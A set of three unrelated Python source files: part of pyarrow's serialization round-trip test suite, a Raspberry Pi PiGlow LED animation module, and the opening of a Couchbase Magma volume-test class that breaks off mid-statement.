elif type(obj1) is dict or type(obj2) is dict:
assert_equal(obj1.keys(), obj2.keys())
for key in obj1.keys():
assert_equal(obj1[key], obj2[key])
elif type(obj1) is list or type(obj2) is list:
assert len(obj1) == len(obj2), ("Objects {} and {} are lists with "
"different lengths."
.format(obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif type(obj1) is tuple or type(obj2) is tuple:
assert len(obj1) == len(obj2), ("Objects {} and {} are tuples with "
"different lengths."
.format(obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif (pa.lib.is_named_tuple(type(obj1)) or
pa.lib.is_named_tuple(type(obj2))):
assert len(obj1) == len(obj2), ("Objects {} and {} are named tuples "
"with different lengths."
.format(obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif isinstance(obj1, pa.Array) and isinstance(obj2, pa.Array):
assert obj1.equals(obj2)
elif isinstance(obj1, pa.Tensor) and isinstance(obj2, pa.Tensor):
assert obj1.equals(obj2)
elif isinstance(obj1, pa.Tensor) and isinstance(obj2, pa.Tensor):
assert obj1.equals(obj2)
elif isinstance(obj1, pa.RecordBatch) and isinstance(obj2, pa.RecordBatch):
assert obj1.equals(obj2)
elif isinstance(obj1, pa.Table) and isinstance(obj2, pa.Table):
assert obj1.equals(obj2)
else:
assert type(obj1) == type(obj2) and obj1 == obj2, \
"Objects {} and {} are different.".format(obj1, obj2)
PRIMITIVE_OBJECTS = [
0, 0.0, 0.9, 1 << 62, 1 << 999,
[1 << 100, [1 << 100]], "a", string.printable, "\u262F",
"hello world", u"hello world", u"\xff\xfe\x9c\x001\x000\x00",
None, True, False, [], (), {}, {(1, 2): 1}, {(): 2},
[1, "hello", 3.0], u"\u262F", 42.0, (1.0, "hi"),
[1, 2, 3, None], [(None,), 3, 1.0], ["h", "e", "l", "l", "o", None],
(None, None), ("hello", None), (True, False),
{True: "hello", False: "world"}, {"hello": "world", 1: 42, 2.5: 45},
{"hello": set([2, 3]), "world": set([42.0]), "this": None},
np.int8(3), np.int32(4), np.int64(5),
np.uint8(3), np.uint32(4), np.uint64(5),
np.float16(1.9), np.float32(1.9),
np.float64(1.9), np.zeros([8, 20]),
np.random.normal(size=[17, 10]), np.array(["hi", 3]),
np.array(["hi", 3], dtype=object),
np.random.normal(size=[15, 13]).T
]
if sys.version_info >= (3, 0):
PRIMITIVE_OBJECTS += [0, np.array([["hi", u"hi"], [1.3, 1]])]
else:
PRIMITIVE_OBJECTS += [long(42), long(1 << 62), long(0), # noqa
np.array([["hi", u"hi"],
[1.3, long(1)]])] # noqa
COMPLEX_OBJECTS = [
[[[[[[[[[[[[]]]]]]]]]]]],
{"obj{}".format(i): np.random.normal(size=[4, 4]) for i in range(5)},
# {(): {(): {(): {(): {(): {(): {(): {(): {(): {(): {
# (): {(): {}}}}}}}}}}}}},
((((((((((),),),),),),),),),),
{"a": {"b": {"c": {"d": {}}}}},
]
class Foo(object):
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
class Bar(object):
def __init__(self):
for i, val in enumerate(COMPLEX_OBJECTS):
setattr(self, "field{}".format(i), val)
class Baz(object):
def __init__(self):
self.foo = Foo()
self.bar = Bar()
def method(self, arg):
pass
class Qux(object):
def __init__(self):
self.objs = [Foo(1), Foo(42)]
class SubQux(Qux):
def __init__(self):
Qux.__init__(self)
class SubQuxPickle(Qux):
def __init__(self):
Qux.__init__(self)
class CustomError(Exception):
pass
Point = collections.namedtuple("Point", ["x", "y"])
NamedTupleExample = collections.namedtuple(
"Example", "field1, field2, field3, field4, field5")
CUSTOM_OBJECTS = [Exception("Test object."), CustomError(), Point(11, y=22),
Foo(), Bar(), Baz(), Qux(), SubQux(), SubQuxPickle(),
NamedTupleExample(1, 1.0, "hi", np.zeros([3, 5]), [1, 2, 3]),
collections.OrderedDict([("hello", 1), ("world", 2)]),
collections.deque([1, 2, 3, "a", "b", "c", 3.5]),
collections.Counter([1, 1, 1, 2, 2, 3, "a", "b"])]
def make_serialization_context():
context = pa.default_serialization_context()
context.register_type(Foo, "Foo")
context.register_type(Bar, "Bar")
context.register_type(Baz, "Baz")
context.register_type(Qux, "Quz")
context.register_type(SubQux, "SubQux")
context.register_type(SubQuxPickle, "SubQuxPickle", pickle=True)
context.register_type(Exception, "Exception")
context.register_type(CustomError, "CustomError")
context.register_type(Point, "Point")
context.register_type(NamedTupleExample, "NamedTupleExample")
return context
global_serialization_context = make_serialization_context()
def serialization_roundtrip(value, scratch_buffer,
context=global_serialization_context):
writer = pa.FixedSizeBufferWriter(scratch_buffer)
pa.serialize_to(value, writer, context=context)
reader = pa.BufferReader(scratch_buffer)
result = pa.deserialize_from(reader, None, context=context)
assert_equal(value, result)
_check_component_roundtrip(value, context=context)
def _check_component_roundtrip(value, context=global_serialization_context):
# Test to/from components
serialized = pa.serialize(value, context=context)
components = serialized.to_components()
from_comp = pa.SerializedPyObject.from_components(components)
recons = from_comp.deserialize(context=context)
assert_equal(value, recons)
@pytest.yield_fixture(scope='session')
def large_buffer(size=32*1024*1024):
return pa.allocate_buffer(size)
def large_memory_map(tmpdir_factory, size=100*1024*1024):
path = (tmpdir_factory.mktemp('data')
.join('pyarrow-serialization-tmp-file').strpath)
# Create a large memory mapped file
with open(path, 'wb') as f:
f.write(np.random.randint(0, 256, size=size)
.astype('u1')
.tobytes()
[:size])
return path
def test_clone():
context = pa.SerializationContext()
class Foo(object):
pass
def custom_serializer(obj):
return 0
def custom_deserializer(serialized_obj):
return (serialized_obj, 'a')
context.register_type(Foo, 'Foo', custom_serializer=custom_serializer,
custom_deserializer=custom_deserializer)
new_context = context.clone()
f = Foo()
serialized = pa.serialize(f, context=context)
deserialized = serialized.deserialize(context=context)
assert deserialized == (0, 'a')
serialized = pa.serialize(f, context=new_context)
deserialized = serialized.deserialize(context=new_context)
assert deserialized == (0, 'a')
def test_primitive_serialization(large_buffer):
for obj in PRIMITIVE_OBJECTS:
serialization_roundtrip(obj, large_buffer)
def test_integer_limits(large_buffer):
# Check that Numpy scalars can be represented up to their limit values
# (except np.uint64 which is limited to 2**63 - 1)
for dt in [np.int8, np.int64, np.int32, np.int64,
np.uint8, np.uint64, np.uint32, np.uint64]:
scal = dt(np.iinfo(dt).min)
serialization_roundtrip(scal, large_buffer)
if dt is not np.uint64:
scal = dt(np.iinfo(dt).max)
serialization_roundtrip(scal, large_buffer)
else:
scal = dt(2**63 - 1)
serialization_roundtrip(scal, large_buffer)
for v in (2**63, 2**64 - 1):
scal = dt(v)
with pytest.raises(pa.ArrowInvalid):
pa.serialize(scal)
def test_serialize_to_buffer():
for nthreads in [1, 4]:
for value in COMPLEX_OBJECTS:
buf = pa.serialize(value).to_buffer(nthreads=nthreads)
result = pa.deserialize(buf)
assert_equal(value, result)
def test_complex_serialization(large_buffer):
for obj in COMPLEX_OBJECTS:
serialization_roundtrip(obj, large_buffer)
def test_custom_serialization(large_buffer):
for obj in CUSTOM_OBJECTS:
serialization_roundtrip(obj, large_buffer)
def test_default_dict_serialization(large_buffer):
pytest.importorskip("cloudpickle")
obj = collections.defaultdict(lambda: 0, [("hello", 1), ("world", 2)])
serialization_roundtrip(obj, large_buffer)
def test_numpy_serialization(large_buffer):
for t in ["bool", "int8", "uint8", "int16", "uint16", "int32",
"uint32", "float16", "float32", "float64", "<U1", "<U2", "<U3",
"<U4", "|S1", "|S2", "|S3", "|S4", "|O"]:
obj = np.random.randint(0, 10, size=(100, 100)).astype(t)
serialization_roundtrip(obj, large_buffer)
obj = obj[1:99, 10:90]
serialization_roundtrip(obj, large_buffer)
def test_datetime_serialization(large_buffer):
data = [
# Principia Mathematica published
datetime.datetime(year=1687, month=7, day=5),
# Some random date
datetime.datetime(year=1911, month=6, day=3, hour=4,
minute=55, second=44),
# End of WWI
datetime.datetime(year=1918, month=11, day=11),
# Beginning of UNIX time
datetime.datetime(year=1970, month=1, day=1),
# The Berlin wall falls
datetime.datetime(year=1989, month=11, day=9),
# Another random date
datetime.datetime(year=2011, month=6, day=3, hour=4,
minute=0, second=3),
# Another random date
datetime.datetime(year=1970, month=1, day=3, hour=4,
minute=0, second=0)
]
for d in data:
serialization_roundtrip(d, large_buffer)
def test_torch_serialization(large_buffer):
pytest.importorskip("torch")
serialization_context = pa.default_serialization_context()
pa.register_torch_serialization_handlers(serialization_context)
# These are the only types that are supported for the
# PyTorch to NumPy conversion
for t in ["float32", "float64",
"uint8", "int16", "int32", "int64"]:
obj = torch.from_numpy(np.random.randn(1000).astype(t))
serialization_roundtrip(obj, large_buffer,
context=serialization_context)
tensor_requiring_grad = torch.randn(10, 10, requires_grad=True)
serialization_roundtrip(tensor_requiring_grad, large_buffer,
context=serialization_context)
@pytest.mark.skipif(not torch or not torch.cuda.is_available(),
reason="requires pytorch with CUDA")
def test_torch_cuda():
# ARROW-2920: This used to segfault if torch is not imported
# before pyarrow
# Note that this test will only catch the issue if it is run
# with a pyarrow that has been built in the manylinux1 environment
torch.nn.Conv2d(64, 2, kernel_size=3, stride=1,
padding=1, bias=False).cuda()
def test_numpy_immutable(large_buffer):
obj = np.zeros([10])
writer = pa.FixedSizeBufferWriter(large_buffer)
pa.serialize_to(obj, writer, global_serialization_context)
reader = pa.BufferReader(large_buffer)
result = pa.deserialize_from(reader, None, global_serialization_context)
with pytest.raises(ValueError):
result[0] = 1.0
def test_numpy_base_object(tmpdir):
# ARROW-2040: deserialized Numpy array should keep a reference to the
# owner of its memory
path = os.path.join(str(tmpdir), 'zzz.bin')
data = np.arange(12, dtype=np.int32)
with open(path, 'wb') as f:
f.write(pa.serialize(data).to_buffer())
serialized = pa.read_serialized(pa.OSFile(path))
result = serialized.deserialize()
assert_equal(result, data)
serialized = None
assert_equal(result, data)
assert result.base is not None
# see https://issues.apache.org/jira/browse/ARROW-1695
def test_serialization_callback_numpy():
class DummyClass(object):
pass
def serialize_dummy_class(obj):
x = np.zeros(4)
return x
def deserialize_dummy_class(serialized_obj):
return serialized_obj
context = pa.default_serialization_context()
context.register_type(DummyClass, "DummyClass",
custom_serializer=serialize_dummy_class,
custom_deserializer=deserialize_dummy_class)
pa.serialize(DummyClass(), context=context)
def test_numpy_subclass_serialization():
# Check that we can properly serialize subclasses of np.ndarray.
class CustomNDArray(np.ndarray):
def __new__(cls, input_array):
array = np.asarray(input_array).view(cls)
return array
def serializer(obj):
return {'numpy': obj.view(np.ndarray)}
def deserializer(data):
array = data['numpy'].view(CustomNDArray)
return array
context = pa.default_serialization_context()
context.register_type(CustomNDArray, 'CustomNDArray',
custom_serializer=serializer,
custom_deserializer=deserializer)
x = CustomNDArray(np.zeros(3))
serialized = pa.serialize(x, context=context).to_buffer()
new_x = pa.deserialize(serialized, context=context)
assert type(new_x) == CustomNDArray
assert np.alltrue(new_x.view(np.ndarray) == np.zeros(3))
def test_numpy_matrix_serialization(tmpdir):
class CustomType(object):
def __init__(self, val):
self.val = val
path = os.path.join(str(tmpdir), 'pyarrow_npmatrix_serialization_test.bin')
array = np.random.randint(low=-1, high=1, size=(2, 2))
for data_type in [str, int, float, CustomType]:
matrix = np.matrix(array.astype(data_type))
with open(path, 'wb') as f:
f.write(pa.serialize(matrix).to_buffer())
serialized = pa.read_serialized(pa.OSFile(path))
result = serialized.deserialize()
assert_equal(result, matrix)
assert_equal(result.dtype, matrix.dtype)
serialized = None
assert_equal(result, matrix)
assert result.base is not None
def test_pyarrow_objects_serialization(large_buffer):
# NOTE: We have to put these objects inside,
# or it will affect 'test_total_bytes_allocated'.
pyarrow_objects = [
pa.array([1, 2, 3, 4]), pa.array(['1', u'never U+1F631', '',
u"233 * U+1F600"]),
pa.array([1, None, 2, 3]),
pa.Tensor.from_numpy(np.random.rand(2, 3, 4)),
pa.RecordBatch.from_arrays(
[pa.array([1, None, 2, 3]),
pa.array(['1', u'never U+1F631', '', u"233 * u1F600"])],
['a', 'b']),
pa.Table.from_arrays([pa.array([1, None, 2, 3]),
pa.array(['1', u'never U+1F631', '',
u"233 * u1F600"])],
['a', 'b'])
]
for obj in pyarrow_objects:
serialization_roundtrip(obj, large_buffer)
def test_buffer_serialization():
class BufferClass(object):
pass
def serialize_buffer_class(obj):
return pa.py_buffer(b"hello")
def deserialize_buffer_class(serialized_obj):
return serialized_obj
context = pa.default_serialization_context()
context.register_type(
BufferClass, "BufferClass",
custom_serializer=serialize_buffer_class,
custom_deserializer=deserialize_buffer_class)
b = pa.serialize(BufferClass(), context=context).to_buffer()
assert pa.deserialize(b, context=context).to_pybytes() == b"hello"
@pytest.mark.skip(reason="extensive memory requirements")
def test_arrow_limits(self):
def huge_memory_map(temp_dir):
return large_memory_map(temp_dir, 100 * 1024 * 1024 * 1024)
with pa.memory_map(huge_memory_map, mode="r+") as mmap:
# Test that objects that are too large for Arrow throw a Python
# exception. These tests give out of memory errors on Travis and need
# to be run on a machine with lots of RAM.
x = 2 ** 29 * [1.0]
serialization_roundtrip(x, mmap)
del x
x = 2 ** 29 * ["s"]
serialization_roundtrip(x, mmap)
del x
x = 2 ** 29 * [["1"], 2, 3, [{"s": 4}]]
serialization_roundtrip(x, mmap)
del x
x = 2 ** 29 * [{"s": 1}] + 2 ** 29 * [1.0]
serialization_roundtrip(x, mmap)
del x
x = np.zeros(2 ** 25)
serialization_roundtrip(x, mmap)
del x
x = [np.zeros(2 ** 18) for _ in range(2 ** 7)]
serialization_roundtrip(x, mmap)
del x
def test_serialization_callback_error():
class TempClass(object):
pass
# Pass a SerializationContext into serialize, but TempClass
# is not registered
serialization_context = pa.SerializationContext()
val = TempClass()
with pytest.raises(pa.SerializationCallbackError) as err:
serialized_object = pa.serialize(val, serialization_context)
assert err.value.example_object == val
serialization_context.register_type(TempClass, "TempClass")
serialized_object = pa.serialize(TempClass(), serialization_context)
deserialization_context = pa.SerializationContext()
# Pass a Serialization Context into deserialize, but TempClass
# is not registered
with pytest.raises(pa.DeserializationCallbackError) as err:
serialized_object.deserialize(deserialization_context)
assert err.value.type_id == "TempClass"
class TempClass2(object):
pass
# Make sure that we receive an error when we use an inappropriate value for
# the type_id argument.
with pytest.raises(TypeError):
serialization_context.register_type(TempClass2, 1)
def test_fallback_to_subclasses():
class SubFoo(Foo):
def __init__(self):
Foo.__init__(self)
# should be able to serialize/deserialize an instance
# if a base class has been registered
serialization_context = pa.SerializationContext()
serialization_context.register_type(Foo, "Foo")
subfoo = SubFoo()
# should fallbact to Foo serializer
serialized_object = pa.serialize(subfoo, serialization_context)
reconstructed_object = serialized_object.deserialize(
serialization_context
)
assert type(reconstructed_object) == Foo
class Serializable(object):
pass
def serialize_serializable(obj):
return {"type": type(obj), "data": obj.__dict__}
def deserialize_serializable(obj):
val = obj["type"].__new__(obj["type"])
val.__dict__.update(obj["data"])
return val
class SerializableClass(Serializable):
def __init__(self):
self.value = 3
def test_serialize_subclasses():
# This test shows how subclasses can be handled in an idiomatic way
# by having only a serializer for the base class
# This technique should however be used with care, since pickling
# type(obj) with couldpickle will include the full class definition
# in the serialized representation.
# This means the class definition is part of every instance of the
# object, which in general is not desirable; registering all subclasses
# with register_type will result in faster and more memory
# efficient serialization.
context = pa.default_serialization_context()
context.register_type(
Serializable, "Serializable",
custom_serializer=serialize_serializable,
custom_deserializer=deserialize_serializable)
a = SerializableClass()
serialized = pa.serialize(a, context=context)
deserialized = serialized.deserialize(context=context)
assert type(deserialized).__name__ == SerializableClass.__name__
assert deserialized.value == 3
def test_serialize_to_components_invalid_cases():
buf = pa.py_buffer(b'hello')
components = {
'num_tensors': 0,
'num_ndarrays': 0,
'num_buffers': 1,
'data': [buf]
}
with pytest.raises(pa.ArrowInvalid):
pa.deserialize_components(components)
components = {
'num_tensors': 0,
'num_ndarrays': 1,
'num_buffers': 0,
'data': [buf, buf]
}
with pytest.raises(pa.ArrowInvalid):
pa.deserialize_components(components)
def test_deserialize_components_in_different_process():
arr = pa.array([1, 2, 5, 6], type=pa.int8())
ser = pa.serialize(arr)
data = pickle.dumps(ser.to_components(), protocol=-1)
code = """if 1:
import pickle
import pyarrow as pa
data = {0!r}
components = pickle.loads(data)
arr = pa.deserialize_components(components)
assert arr.to_pylist() == [1, 2, 5, 6], arr
""".format(data)
subprocess_env = test_util.get_modified_env_with_pythonpath()
print("** sys.path =", sys.path)
print("** setting PYTHONPATH to:", subprocess_env['PYTHONPATH'])
subprocess.check_call(["python", "-c", code], env=subprocess_env)
def test_serialize_read_concatenated_records():
# ARROW-1996 -- see stream alignment work in ARROW-2840, ARROW-3212
f = pa.BufferOutputStream()
pa.serialize_to(12, f)
pa.serialize_to(23, f)
buf = f.getvalue()
f = pa.BufferReader(buf)
pa.read_serialized(f).deserialize()
pa.read_serialized(f).deserialize()
@pytest.mark.skipif(os.name == 'nt', reason="deserialize_regex not pickleable")
def test_deserialize_in_different_process():
from multiprocessing import Process, Queue
import re
regex = re.compile(r"\d+\.\d*")
serialization_context = pa.SerializationContext()
serialization_context.register_type(type(regex), "Regex", pickle=True)
serialized = pa.serialize(regex, serialization_context)
serialized_bytes = serialized.to_buffer().to_pybytes()
def deserialize_regex(serialized, q):
import pyarrow as pa
q.put(pa.deserialize(serialized))
q = Queue()
p = Process(target=deserialize_regex, args=(serialized_bytes, q))
p.start()
assert q.get().pattern == regex.pattern
p.join()
def test_deserialize_buffer_in_different_process():
import tempfile
f = tempfile.NamedTemporaryFile(delete=False)
b = pa.serialize(pa.py_buffer(b'hello')).to_buffer()
f.write(b.to_pybytes())
f.close()
subprocess_env = test_util.get_modified_env_with_pythonpath()
dir_path = os.path.dirname(os.path.realpath(__file__))
python_file = os.path.join(dir_path, 'deserialize_buffer.py')
subprocess.check_call([sys.executable, python_file, f.name],
env=subprocess_env)
def test_set_pickle():
# Use a custom type to trigger pickling.
class Foo(object):
pass
context = pa.SerializationContext()
context.register_type(Foo, 'Foo', pickle=True)
test_object = Foo()
# Define a custom serializer and deserializer to use in place of pickle.
def dumps1(obj):
return b'custom'
def loads1(serialized_obj):
return serialized_obj + b' serialization 1'
# Test that setting a custom pickler changes the behavior.
context.set_pickle(dumps1, loads1)
serialized = pa.serialize(test_object, context=context).to_buffer()
deserialized = pa.deserialize(serialized.to_pybytes(), context=context)
assert deserialized == b'custom serialization 1'
# Define another custom serializer and deserializer.
def dumps2(obj):
return b'custom'
def loads2(serialized_obj):
return serialized_obj + b' serialization 2'
# Test that setting another custom pickler changes the behavior again.
context.set_pickle(dumps2, loads2)
serialized = pa.serialize(test_object, context=context).to_buffer()
deserialized = pa.deserialize(serialized.to_pybytes(), context=context)
assert deserialized == b'custom serialization 2'
@pytest.mark.skipif(sys.version_info < (3, 6), reason="need Python 3.6")
def test_path_objects(tmpdir):
# Test compatibility with PEP 519 path-like objects
import pathlib
p = pathlib.Path(tmpdir) / 'zzz.bin'
obj = 1234
pa.serialize_to(obj, p)
res = pa.deserialize_from(p, None)
assert res == obj
def test_tensor_alignment():
# Deserialized numpy arrays should be 64-byte aligned.
x = np.random.normal(size=(10, 20, 30))
y = pa.deserialize(pa.serialize(x).to_buffer())
assert y.ctypes.data % 64 == 0
xs = [np.random.normal(size=i) for i in range(100)]
ys = pa.deserialize(pa.serialize(xs).to_buffer())
for y in ys:
assert y.ctypes.data % 64 == 0
xs = [np.random.normal(size=i * (1,)) for i in range(20)]
ys = pa.deserialize(pa.serialize(xs).to_buffer())
for y in ys:
assert y.ctypes.data % 64 == 0
xs = [np.random.normal(size=i * (5,)) for i in range(1, 8)]
xs = [xs[i][(i + 1) * (slice(1, 3),)] for i in range(len(xs))]
ys = pa.deserialize(pa.serialize(xs).to_buffer())
for y in ys:
assert y.ctypes.data % 64 == 0
def test_serialization_determinism():
for obj in COMPLEX_OBJECTS:
buf1 = pa.serialize(obj).to_buffer()
buf2 = pa.serialize(obj).to_buffer()
assert buf1.to_pybytes() == buf2.to_pybytes()
def test_serialize_recursive_objects():
class ClassA(object):
pass
# Make a list that contains itself.
lst = []
lst.append(lst)
# Make an object that contains itself as a field.
a1 = ClassA()
a1.field = a1
# Make two objects that contain each other as fields.
a2 = ClassA()
a3 = ClassA()
a2.field = a3
a3.field = a2
# Make a dictionary that contains itself.
d1 = {}
d1["key"] = d1
# Make a numpy array that contains itself.
arr = np.array([None], dtype=object)
arr[0] = arr
# Create a list of recursive objects.
recursive_objects = [lst, a1, a2, a3, d1, arr]
# Check that exceptions are thrown when we serialize the recursive
# objects.
for obj in recursive_objects:
with pytest.raises(Exception):
pa.serialize(obj).deserialize()
|
piglowui.py
|
#!/usr/bin/python
#
# Copyright 2016 Deany Dean
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import piglow
from multiprocessing import Process, Queue
from Queue import Full, Empty
from time import sleep
#
# Piglow UI utils for piglow-sys library.
#
def start(clear=True):
""" Start PiGlow UI updates """
if _enabled:
return
if clear:
_change_task("_clear_all")
_change_task("_enable")
_start_updater()
def stop(clear=True):
""" Stop any PiGlow UI updates """
if clear:
_change_task("_clear_all")
_change_task("_disable")
def clear_all():
""" Clear all LEDs """
_change_task("_clear_all")
def pulse_color(color, speed=10, low=64, high=255):
""" Pulse each LED of the defined color at the defined speed. """
_change_task("_pulse_color", [color, speed, low, high], True)
def set_color(color, value):
""" Set the value of the defined color """
_change_task("_set_color", [color, value])
def cycle(leds, speed=10, low=0, high=255):
""" Cycle each LED from low to high in order """
_change_task("_cycle", [leds, speed, low, high], True)
def dim(led, speed=2, high=255, low=0):
""" Dims the LED from high to low at the given speed """
_change_task("_dim", [led, speed, high, low], True)
def set(leds, value):
""" Sets the value of each led """
_change_task("_set", [leds, value])
def pulse(led, speed=2, low=0, high=255):
""" Pulse the LED from low to high at the given speed """
_change_task("_pulse", [led, speed, low, high], True)
#
# Private functions to drive the UI (ie, PiGlow updates)
#
_enabled = False
_task_queue = Queue()
_updater_process = None
_NOTASK_SLEEP_INTERVAL = 1
def _enable():
""" Enable the PiGlow UI updates """
global _enabled
_enabled = True
def _disable():
""" Disable the PiGlow UI updates """
global _enabled
_enabled = False
def _change_task(task, args=[], repeat=False, interval=0):
""" Change the current task """
try:
_task_queue.put([task, args, repeat, interval])
except Full:
print "Task ", task, " failed. Task queue full"
return
def _handle_tasks(tasks):
""" Perform the UI update for the current task """
global _enabled
task = None
_enabled = True
while _enabled:
try:
task = tasks.get(False)
except Empty:
# Do nothing, this is a valid state
pass
# If we have no task, just sleep for an interval and read again
if task is None:
sleep(_NOTASK_SLEEP_INTERVAL)
continue
# Get and exec the task method
task_method = globals()[task[0]]
if task_method is None:
sleep(task[3])
continue
else:
task_method(*task[1])
if not task[2]:
task = None
def _start_updater():
""" Start an updater process if there isn't already one """
global _updater_process
# If already enabled, just return
if _enabled:
return
_updater_process = Process(target=_handle_tasks, args=(_task_queue,))
_updater_process.start()
#
# API drawing task functions
#
def _clear_all():
""" Clear all LEDs """
for l in range(0, 18):
piglow.set(l, 0)
piglow.show()
def _set_color(color, value):
""" Set the value of the defined color """
color_setter = getattr(piglow, color)
color_setter(value)
piglow.show()
def _pulse_color(color, speed, low, high):
""" Pulse each LED of the defined color at the given speed """
color_setter = getattr(piglow, color)
pulse_range = range(low, high)
wait_for = 1/speed
for c in pulse_range:
color_setter(c)
piglow.show()
sleep(wait_for)
for c in reversed(pulse_range):
color_setter(c)
piglow.show()
sleep(wait_for)
def _pulse(led, speed, low, high):
""" Pulse the LED from low to high """
pulse_range = range(low, high)
wait_for = 1/speed
for c in pulse_range:
piglow.set(led, c)
piglow.show()
sleep(wait_for)
for c in reversed(pulse_range):
piglow.set(led, c)
piglow.show()
sleep(wait_for)
def _set(leds, value):
""" Sets the value of each led """
for led in leds:
piglow.set(led, value)
piglow.show()
def _dim(led, speed, high, low):
""" Dims the led from high to low at the given speed """
dim_range = range(low, high)
wait_for = 1/speed
for c in reversed(dim_range):
piglow.set(led, c)
piglow.show()
sleep(wait_for)
def _cycle(leds, speed, low, high):
""" Cycle each LED from low to high in order """
pulse_range = range(low, high)
wait_for = 1/speed
# Set each LED to the LOW state
_set(leds, low)
for i in range(0, len(leds)):
for c in pulse_range:
# Increase the LED to HIGH
piglow.set(leds[i], c)
piglow.show()
sleep(wait_for)
# Decrease the previous LED back to LOW at same rate
if i > 0:
piglow.set(leds[i-1], high-(c-low))
piglow.show()
sleep(wait_for)
# Decrease the final LED back to LOW state
_dim(leds[-1], speed, high, low)
# Set each LED to the LOW state
_set(leds, low)
|
Magma.py
|
'''
Created on Mar 29, 2020
@author: riteshagarwal
'''
import random
from BucketLib.BucketOperations import BucketHelper
from BucketLib.bucket import Bucket
from TestInput import TestInputSingleton
from basetestcase import BaseTestCase
from couchbase_helper.documentgenerator import doc_generator
from error_simulation.cb_error import CouchbaseError
from membase.api.rest_client import RestConnection, RestHelper
from remote.remote_util import RemoteMachineShellConnection
from sdk_exceptions import SDKException
from table_view import TableView
from Cb_constants.CBServer import CbServer
import os
from memcached.helper.data_helper import MemcachedClientHelper
from cb_tools.cbstats import Cbstats
import threading
import time
from custom_exceptions.exception import RebalanceFailedException
import math
import subprocess
from math import ceil
from Jython_tasks.task_manager import TaskManager as local_tm
import copy
from com.couchbase.test.taskmanager import TaskManager
from com.couchbase.test.sdk import Server, SDKClient
from com.couchbase.test.sdk import SDKClient as NewSDKClient
from com.couchbase.test.docgen import WorkLoadSettings,\
DocumentGenerator
from com.couchbase.test.loadgen import WorkLoadGenerate
from com.couchbase.test.docgen import DocRange
from java.util import HashMap
from couchbase.test.docgen import DRConstants
from com.couchbase.test.key import SimpleKey
from com.couchbase.client.core.error import DocumentExistsException,\
TimeoutException, DocumentNotFoundException, ServerOutOfMemoryException
class volume(BaseTestCase):
def init_doc_params(self):
self.create_perc = 100
self.update_perc = self.input.param("update_perc", 50)
self.delete_perc = self.input.param("delete_perc", 50)
self.expiry_perc = self.input.param("expiry_perc", 0)
self.read_perc = self.input.param("read_perc", 100)
self.start = 0
self.end = 0
self.initial_items = self.start
self.final_items = self.end
self.create_end = 0
self.create_start = 0
self.read_start = 0
self.read_end = 0
self.update_end = 0
self.update_start = 0
self.delete_end = 0
self.delete_start = 0
self.expire_end = 0
self.expire_start = 0
def setUp(self):
BaseTestCase.setUp(self)
self.init_doc_params()
self.num_collections = self.input.param("num_collections", 1)
self.num_scopes = self.input.param("num_scopes", 1)
self.num_buckets = self.input.param("num_buckets", 1)
self.doc_ops = self.input.param("doc_ops", "create")
self.mutation_perc = 100
if self.doc_ops:
self.doc_ops = self.doc_ops.split(':')
self.max_tasks_per_collection = 8
process_concurrency = int(math.ceil(self.max_tasks_per_collection /
float(len(self.doc_ops))))
process_concurrency = self.input.param("pc", process_concurrency)
doc_tasks = (self.num_buckets*self.num_scopes*self.num_collections) * len(self.doc_ops) * process_concurrency + 2
self.thread_to_use = min(64, doc_tasks)
self.input.test_params.update({"threads_to_use":
self.thread_to_use})
self.log.critical("Total Doc-Tasks workers = %s" % self.thread_to_use)
self.log.critical("Total Doc-Tasks = %s" % doc_tasks)
self.doc_loading_tm = local_tm(number_of_threads=self.thread_to_use)
self.process_concurrency = self.input.param("pc", process_concurrency)
self.rest = RestConnection(self.servers[0])
self.op_type = self.input.param("op_type", "create")
self.dgm = self.input.param("dgm", None)
self.available_servers = self.cluster.servers[self.nodes_init:]
self.num_buckets = self.input.param("num_buckets", 1)
self.mutate = 0
self.iterations = self.input.param("iterations", 2)
self.step_iterations = self.input.param("step_iterations", 1)
self.rollback = self.input.param("rollback", True)
self.vbucket_check = self.input.param("vbucket_check", True)
self.new_num_writer_threads = self.input.param(
"new_num_writer_threads", 6)
self.new_num_reader_threads = self.input.param(
"new_num_reader_threads", 8)
self.end_step = self.input.param("end_step", None)
self.key_prefix = "Users"
self.crashes = self.input.param("crashes", 20)
self.check_dump_thread = True
self.skip_read_on_error = False
self.suppress_error_table = False
self.track_failures = True
self.loader_dict = None
self.parallel_reads = self.input.param("parallel_reads", False)
self._data_validation = self.input.param("data_validation", True)
self.disable_magma_commit_points = self.input.param(
"disable_magma_commit_points", False)
self.fragmentation = int(self.input.param("fragmentation", 50))
self.cursor_dropping_checkpoint = self.input.param(
"cursor_dropping_checkpoint", None)
self.assert_crashes_on_load = self.input.param("assert_crashes_on_load",
True)
#######################################################################
self.PrintStep("Step 1: Create a %s node cluster" % self.nodes_init)
if self.nodes_init > 1:
nodes_init = self.cluster.servers[1:self.nodes_init]
self.task.rebalance([self.cluster.master], nodes_init, [])
self.cluster.nodes_in_cluster.extend(
[self.cluster.master] + nodes_init)
else:
self.cluster.nodes_in_cluster.extend([self.cluster.master])
self.cluster_util.set_metadata_purge_interval(self.cluster.master)
#######################################################################
self.PrintStep("Step 2: Create required buckets and collections.")
self.create_required_buckets()
props = "magma"
update_bucket_props = False
if self.disable_magma_commit_points:
props += ";magma_max_commit_points=0"
update_bucket_props = True
if self.cursor_dropping_checkpoint:
props += ";cursor_dropping_checkpoint_mem_upper_mark=%s" %\
str(self.cursor_dropping_checkpoint)
update_bucket_props = True
if update_bucket_props:
self.bucket_util.update_bucket_props(
"backend", props,
self.cluster, self.cluster.buckets)
self.sleep(10, "Sleep for 10 seconds so that collections \
can be created")
else:
for node in self.servers:
shell = RemoteMachineShellConnection(node)
shell.enable_diag_eval_on_non_local_hosts()
shell.disconnect()
self.scope_name = self.input.param("scope_name",
CbServer.default_scope)
if self.scope_name != CbServer.default_scope:
self.bucket_util.create_scope(self.cluster.master,
self.bucket,
